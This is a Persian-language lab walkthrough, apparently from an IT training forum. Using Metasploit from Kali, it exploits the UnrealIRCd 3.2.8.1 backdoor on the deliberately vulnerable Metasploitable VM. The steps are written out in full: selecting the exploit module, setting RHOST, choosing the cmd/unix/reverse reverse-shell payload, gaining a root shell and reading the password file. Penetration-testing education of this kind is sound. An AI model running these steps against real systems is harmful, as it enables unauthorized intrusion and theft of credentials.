آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

سلام به دوستان عزیز ITPro ای و علاقه‌مندان به مباحث امنیت شبکه. در قسمت پیش از آموزش نفوذ به سیستم عامل Metasploitable، نحوه اسکن کردن این سیستم عامل را از طریق کالی و بصورت ریموت (از راه دور) توضیح دادیم. در این بخش نیز در ادامه صحبت های پیشین قصد داریم تا به exploit کردن سرویس Unreal IRC بپردازیم.در مورد این سرویس بصورت مختصر در قسمت پیش توضیح دادیم و پیشنهاد میکنیم برای شروع این بخش ابتدا به مطالعه قسمت پیش بپردازید. با ما همراه باشید:

برای شروع کار ابتدا Metasploit را اجرا میکنیم:

root@kali:~#msfconsole

حالا از دستور "search" استفاده کرده و در قسمت "نام سرویس" و "نسخه برنامه" جایگذاری میکنیم:

Msf> search Unreal 3.2.8.1

اجرای این دستور، نتیجه زیر را برمیگرداند:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

یک بکدور Unreal 3.2.8.1 با قابلیت اطمینان "excellent"!

بد نیست بدانید که Exploit ها بر اساس درصد موفقیت و ماندگاری شان رتبه بندی میشوند.

اگر تعریف Metasploit را به یاد داشته باشید، میدانید که راه های مختلفی برای بهره برداری (Exploit) از یک آسیب پذیری وجود دارد:

• انتخاب یک Exploit

• تنظیم آپشن های Exploit

• انتخاب یک payload

• تنظیم اپشن های payload

• اجرای Exploit

• برقراری ارتباط با سیستم ریموت

حال میخواهیم طبق این دستور العمل سناریو خود را پیش ببریم.

انتخاب یک Exploit


اگر از دستور "info" استفاده کنیم، میتوانیم کمی بیشتر در مورد Exploit احتمالیمان اطلاعات کسب کنیم.

Msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

با اجرای این دستور، توضیحات زیر بما برگردانده میشود:

"" این ماژول از یک بکدور ناخواسته که در آرشیو دانلود Unreal IRCD 3.2.8.1 اضافه شده است، سوء استفاده میکند. این بکدور در آرشیو Unreal3.2.8.1.tar.gz و بین تاریخ نوامبر 2009 تا 12 ژوئن 2010 موجود است. ""

ادامه میدهیم:

میخواهیم از Exploit مورد نظرمان استفاده کنیم. پس فرمان زیر را وارد کرده و آپشن های آن را چک میکنیم:

 Use exploit/unix/irc/unreal_ircd_3281_backdoor 

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

همانطور که میبینید، آپشن های زیادی برای تنظیم وجود ندارد. فقط کافیست که آدرس Host مقصد را وارد کنیم:

Set RHOST 192.168.198.145

که در اینجا 192.168.198.145، ادرس Metasploitable است.

انتخاب یک payload


حالا نیاز داریم تا یک payload را انتخاب کنیم. برای این منظور تایپ میکنیم : "show payloads" تا تمام payload هایی که با Exploit مورد نظر ما سازگار هستند، نمایش داده شوند:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

متاسفانه تمام آن ها از نوع شل های دستوری (command shell) هستند. خوب همانطور که قبلا هم بشما آموزش دادیم، یک Meterpreter shell ذاتا بهتر از یک شل دستوری یا command shell است؛ اما در این مورد خاص چاره ای نداریم بجز آن که یکی از شل های دستوری را انتخاب کنیم. از generic reverse shell استفاده میکنیم. این شل پس از اتمام Exploit، دقیقا ما را درون یک terminal shell در سیستم هدف قرار میدهد. حالا باید عبارت زیر را تایپ کنید:

Set payload cmd/unix/reverse

و سپس :

Show options

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

تنظیم آپشن های payload


برای این payload آن چیزی که احتیاج داریم اینست که دستور "LHOST" را تنظیم کرده (آدرس IP سیستم کالی) و سپس مجددا برای اطمینان از صحت انجام کارها دستور "show options" را وارد کنیم:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

مقادیر RHOST (سیستم مقصد) و LHOST (سیستم کالی) بدرستی جایگذاری شده اند. همه چیز در نقطه اوج خودش قرار دارد و در نهایت برای رسیدن به هدفمان باید دستور "exploit" را صادر کنیم:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

بیاد داشته باشید که نهایت کاری که با اجرای این دستور برای شما انجام شده است، باز شدن یک session است و بعد از آن یک کرسر چشمک زن انتظار اقدام بعدی شما را میکشد.

شما در سیستم هدف و در یک Terminal shell قرار دارید!

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

همانطور که میبینید، ما عبارت "whoami" را تایپ کردیم و سیستم بلافاصله با کلمه "root" به استقبال ما آمد. شناسه کاربری root بالاترین دسترسی و سطح را در یک سیستم لینوکسی دارد.

پس همانطور که مشاهده کردید، exploit و payload ما کار میکند! این نکته را هم بگوییم که تمام دستورات استاندارد لینوکس در شل ی که ما داریم کار میکنند. برای مثال میتوانیم فایل پسورد را نشان دهیم:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

همانطور که دیدید، توانستیم با کرک کردن فایل پسورد ها، به پسوردهای واقعی دست پیدا کنیم. اما اگر برایتان گنگ بود، نگران نباشید. این کار را فقط برای تست انجام دادیم و در آموزش حملات پسورد بصورت کامل اینکار را برایتان شرح خواهیم داد.

سربلند و مانا باشید.

پایان

نویسنده: احسان امجدی

منبع: انجمن تخصصی فناوری اطلاعات ایران

هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.

#چگونه_تست_نفوذ_بگیریم؟ #meterpreter_shell_چیست؟ #آموزش_متااسپلویت #آموزش_لینوکس_کالی #command_shell_چیست؟ #روش_استفاده_از_exploit_در_metasploit #آموزش_exploit_کردن_سیستم_آسیب_پذیر #payload_چیست؟ #آموزش_گام_به_گام_هک_و_امنیت #آموزش_metasploit
عنوان
1 آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش اول رایگان
2 آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش دوم رایگان
3 آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی رایگان
زمان و قیمت کل 0″ 0
1 نظر
shm700

سلام

من یک IDS تحت عنوان smoothsec دارم

تصمیم دارم این سیستم اسیب پذیرو راه اندازی کنم و بهش حمله کنم و IDS من تشخیص بده این حمله رو!..میتونم بپرسم چطور میتونم ip این سیستم عامل رو به IDS م بدم که بتونه نفوذو تشخیص بده؟

نظر شما
برای ارسال نظر باید وارد شوید.
از سرتاسر توسینسو
تنظیمات حریم خصوصی
تائید صرفنظر
×

تو می تونی بهترین نتیجه رو تضمینی با بهترین های ایران بدست بیاری ، پس مقایسه کن و بعد خرید کن : فقط توی جشنواره تابستانه می تونی امروز ارزونتر از فردا خرید کنی ....